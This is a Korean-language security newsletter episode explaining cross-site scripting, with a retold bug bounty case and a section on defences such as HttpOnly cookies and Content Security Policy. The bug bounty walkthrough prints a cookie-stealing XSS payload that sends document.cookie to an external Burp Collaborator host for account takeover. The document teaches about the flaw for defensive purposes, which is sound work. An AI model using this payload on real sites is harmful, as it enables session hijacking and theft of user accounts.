🤔 자네가 날 속이고 쿠키를 가져간 건… 말이 되고?

해킹 알려줄게

11화: XSS(Cross Site Scripting)

안녕하세요!

버그바운티 플랫폼 HackerOne에서 2020년 가장 많은 영향력을 행사하고 포상을 많이 받은 상위 10개의 취약점을 발표했어요.

그중에 1위를 차지한 취약점은 바로 🥇 XSS🥇 입니다!

2019년보다 26%가 증가한 총 420만 달러를 받았다고 하네요. 😮

오늘 같이 알아볼 취약점이 바로 이 XSS 입니다! 🤓

XSS 취약점이 뭐에요?

XSS는 Cross Site Scripting의 약자에요. 😄

원래대로라면 CSS여야 하지만 HTML 요소에 디자인을 입혀주는 'Cascading Style Sheets'가 이미 CSS라고 불리고 있어서 혼동하지 않도록 XSS라고 불려요.

XSS는 해커가 악의적인 Javascript 코드를 웹에 삽입한 후 사용자의 웹 브라우저에서 해당 코드가 실행되도록 만드는 공격입니다.

자세한 예시를 들어주세요!

여기 이름을 입력받아 submit 버튼을 누르면 웹 사이트에서 이름을 보여주는 웹 사이트가 있습니다. 이름을 적는 칸에 hackyboiz를 적고 submit 버튼을 누르면 'Hello hackyboiz!' 가 출력되는 거죠. 😀

이때 submit 버튼을 누르면 사용자가 입력한 name이 GET /?name=hackyboiz 같은 HTTP 요청이 보내지고 HTML 코드인 <body> Hello hackyboiz! </body> 으로 화면에 출력되는 거예요.

⭐ 중요한 것은 사용자가 입력한 값이 그대로 HTML에 들어가게 됩니다. 😦

그렇다면 Javascript는 어떻게 HTML에 삽입할 수 있을까요?

대표적으로 <script> 태그를 사용하면 Javascript를 HTML 안에 삽입할 수 있어요.

앞서 했던 예시에서 <script> alert(1) </script> 를 삽입해 볼까요? <body> Hello <script> alert(1) </script></body>으로 Javascript가 실행되어 1이 적혀있는 알림창이 뜨게 되겠죠! 😢

Javascript를 삽입해서 무엇을 할 수 있을까요?

단순히 alert 메시지만 띄우면 문제가 되지 않을 수 있지만, 해커들이 XSS 공격으로 가장 많이 노리는 것은 세션 ID가 포함된 쿠키를 훔치는 것입니다.

쿠키🍪 는 바로 지난주 해킹 알려줄게에서 설명드렸어요!

사용자의 쿠키와 안에 저장된 세션ID를 얻게 되면, 해당 사용자의 권한을 얻을 수 있습니다. 😦 그러면 탈취한 계정으로 또 악의적인 행동을 할 수 있어요.

다른 방법도 생각해 볼까요?

해커가 게시판에 글을 쓰는데 제목을 자극적으로 적어서 사람들이 클릭하게끔 유도하고, 내용에는 악성 사이트로 이동하거나, 또는 악성코드를 실행하게 하는 스크립트를 작성한다고 해볼게요. 해당 게시물을 클릭한 사용자들의 컴퓨터 해커가 적은 스크립트대로 실행되어 어떤 일이 생길지는 여러분의 상상에 맡길게요. 😲💭

실제로 XSS로 사용자의 계정을 어떻게 탈취할 수 있나요?

3달 전, 7월 21일에 제보되어 $1000을 받은 버그바운티를 소개해드릴게요. 🤑

특정 웹사이트에서는 조직을 생성하고, 조직에 사용자를 초대하는 등의 많은 기능이 있었는데, 이 초대를 보내는 것만으로 계정을 탈취할 수 있었습니다.

이 취약점을 제보한 Vikram Naidu는 처음에 조직 생성 기능에서 조직 이름을 <script>alert(document.cookie)</script>로 등록했지만 XSS가 트리거 되지 않아서 조직 이름을 xyz로 변경하고 사용자 초대 기능으로 눈길을 돌렸어요.

크롬에서 초대를 받은 두 번째 계정에 로그인하자마자 상단에 다음과 같은 알림이 표시되는데, 내용 중 등록했던 조직 이름(xyz)이 포함되어 있습니다!!!

꺄아아아아악

여기까지 보면 이제 어떻게 할 수 있을지 알겠나요?

즉시 첫 번째 계정으로 돌아가 조직의 이름을 <script>alert(document.cookie)</script>로 다시 변경하고, 초대를 받을 때 XSS가 트리거 되는지 확인해봅시다.

XSS가 트리거되고 팝업으로 사용자 세션을 담당하는 인증 토큰을 포함해서 모든 쿠키를 볼 수 있습니다. 😎

또한 자신의 계정으로 로그인할 때 유일하게 set-cookie가 사용자 세션을 담당하는 것을 확인했어요.

피해자의 계정을 탈취하기 위해 이 쿠키값을 해커가 제어하는 서버로 리디렉션 되는 방식으로 burp collaborator client를 열고 페이로드(조직의 이름)를 <script>new Image().src=”<http://burp.burpcollaborator.net/abc.php?output=>"+document.cookie;</script> 로 수정해봅시다.

이 페이로드를 사용해 초대장을 보내면, 피해자가 자신의 계정에 로그인하자마자 XSS가 트리거되고 해커의 Burp colloaborator client는 피해자 쿠키의 세부 정보가 포함된 http 요청을 받게 됩니다. 따라서 로그인하는 동안 해당 쿠키를 내 쿠키로 대체하면 피해자 계정으로 직접 로그인할 수 있어요.

어떻게 해결할 수 있을까요? 🤔

XSS 방지는 쉽지 않다고 해요. 일반적인 방법부터 하나씩 알아봐요!

Command Injection에서도 마찬가지지만, 역시 사용자의 입력을 100% 믿으면 안됩니다. 🙄 사용자가 입력한 내용을 최대한 엄격하게 필터링하고, XSS Cheat Sheet에 대한 필터 목록을 만들어 Javascript가 실행되지 않도록 해야겠네요.

또한, XSS를 방어하는 라이브러리와 브라우저 확장앱을 사용할 수 있습니다. 개발자는 서버에 AntiXSS 라이브러리를 사용하여 방어할 수 있고, 사용자는 자신의 컴퓨터에서 악의적인 스크립트가 실행되지 않도록 해야 합니다.

Set-Cookie 응답 헤더에는 서버에서 사용자 브라우저에 쿠키를 전송하기 위해 사용되는데 이때 HttpOnly Flag가 존재해요. Set-Cookie: <cookie-name>=<cookie-value>; HttpOnly 이 속성은 XSS 취약점의 공격을 방해하기 위한 목적으로 쿠키에 대한 접근을 차단할 수 있습니다.

그래도 여전히 해커가 XSS 취약점으로 사용자의 브라우저에서 Javascript를 실행할 수 있다면요..? 😥

마지막 대응 방안으로 보안 정책인 Content Security Policy(CSP)를 소개할게요! CSP는 공격자가 웹 내부에서 Javascript를 실행할 수 있더라도 특정 도메인의 리소스만 참조할 수 있게 하거나, 리소스를 아예 참조하지 못하게 하는 등의 리소스에 대한 보안 정책을 설정하여 허가되지 않은 스크립트 로드 자체를 방지하는 보안 정책입니다.

그럼 다음 주에는 더 유익한 "해킹 알려줄게"로 돌아올게요~ 😎

by y00n_nms

오늘 전해드린 내용이 마음에 드셨나요?

주위 친구들에게 뉴스레터를 추천해주세요!

다음주에도 알찬 내용으로 돌아오겠습니다. 😙